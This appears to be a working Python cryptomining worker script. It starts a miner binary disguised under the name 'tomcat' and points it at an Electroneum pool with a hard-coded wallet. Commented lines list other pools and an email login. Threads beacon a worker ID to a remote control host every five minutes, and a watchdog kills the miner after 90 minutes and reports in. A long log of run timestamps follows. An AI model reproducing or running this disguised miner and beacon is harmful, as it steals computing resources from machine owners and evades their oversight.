import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:08.285541
#2018-02-17 16:51:06.723693
#2018-02-17 18:39:06.927127
#2018-02-17 20:27:01.731643
#2018-02-17 22:14:03.548741
#2018-02-17 23:58:05.632863
#2018-02-18 01:48:07.550972
#2018-02-18 03:37:02.185256
#2018-02-18 05:24:04.119432
#2018-02-18 07:16:01.842255
#2018-02-18 09:03:01.310499
#2018-02-18 10:50:03.090567
#2018-02-18 12:38:05.403219
#2018-02-18 14:24:04.283720
#2018-02-18 16:15:08.946152
#2018-02-18 18:06:03.454813
#2018-02-18 19:51:07.227413
#2018-02-18 21:37:06.889073
#2018-02-18 23:25:07.110140
#2018-02-19 01:12:04.785461
#2018-02-19 02:58:06.499042
#2018-02-19 04:45:07.670005
#2018-02-19 06:29:04.695507
#2018-02-19 08:19:05.013529
#2018-02-19 10:08:01.962214
#2018-02-19 11:56:08.869955
#2018-02-19 13:43:05.636788
#2018-02-19 15:31:01.575223
#2018-02-19 17:18:08.480739
#2018-02-19 19:07:02.038740
#2018-02-19 20:53:06.396262
#2018-02-19 22:42:05.474094
#2018-02-20 00:25:08.578182
#2018-02-20 02:14:02.011944
#2018-02-20 04:04:05.349268
#2018-02-20 05:47:05.771980
#2018-02-20 07:33:05.250798
#2018-02-20 09:17:05.091004
#2018-02-20 10:59:08.601194
#2018-02-20 12:46:08.034804
#2018-02-20 14:32:04.095415
#2018-02-20 16:16:09.976433
#2018-02-20 18:02:08.829761
#2018-02-20 19:53:06.980969
#2018-02-20 21:42:02.239337
#2018-02-20 23:24:01.865261
#2018-02-21 01:08:06.042429
#2018-02-21 02:55:06.650372
#2018-02-21 04:43:06.277377
#2018-02-21 06:33:07.111672
#2018-02-21 08:18:04.366420
#2018-02-21 10:04:01.860736
#2018-02-21 11:51:04.768460
#2018-02-21 13:41:06.670976
#2018-02-21 15:24:05.813810
#2018-02-21 17:14:04.640895
#2018-02-21 19:01:07.673084
#2018-02-21 20:50:07.128560
#2018-02-21 22:34:07.048707
#2018-02-22 00:24:05.475281
#2018-02-22 02:12:01.414973
#2018-02-22 03:57:06.840258
#2018-02-22 05:44:06.906395
#2018-02-22 07:29:02.015808
#2018-02-22 09:16:07.559947
#2018-02-22 11:04:01.432006
#2018-02-22 12:51:09.162357
#2018-02-22 14:37:06.923874
#2018-02-22 16:23:08.351886
#2018-02-22 18:11:01.716533
#2018-02-22 19:59:08.343036
#2018-02-22 21:49:04.666734
#2018-02-22 23:38:10.713630
#2018-02-23 01:25:08.693801
#2018-02-23 03:13:06.204556
#2018-02-23 05:00:05.837002
#2018-02-23 06:45:01.735897
#2018-02-23 08:35:09.111908
#2018-02-23 10:49:07.150765
#2018-02-23 12:47:02.201055
#2018-02-23 14:32:01.719401
#2018-02-23 16:21:09.007757
#2018-02-23 18:07:06.222616
#2018-02-23 19:52:02.260102
#2018-02-23 21:36:08.489712
#2018-02-23 23:23:07.151693
#2018-02-24 01:16:07.294435
#2018-02-24 03:07:07.911102
#2018-02-24 04:53:04.643525
#2018-02-24 06:37:03.904874
#2018-02-24 08:26:07.070642
#2018-02-24 10:12:06.481064
#2018-02-24 12:07:03.733720
#2018-02-24 13:54:01.222809
#2018-02-24 15:39:01.753411
#2018-02-24 17:33:07.305442
#2018-02-24 19:19:05.191259
#2018-02-24 21:08:04.652265
#2018-02-24 23:41:06.193480
#2018-02-25 03:01:07.205678
#2018-02-25 06:56:03.522765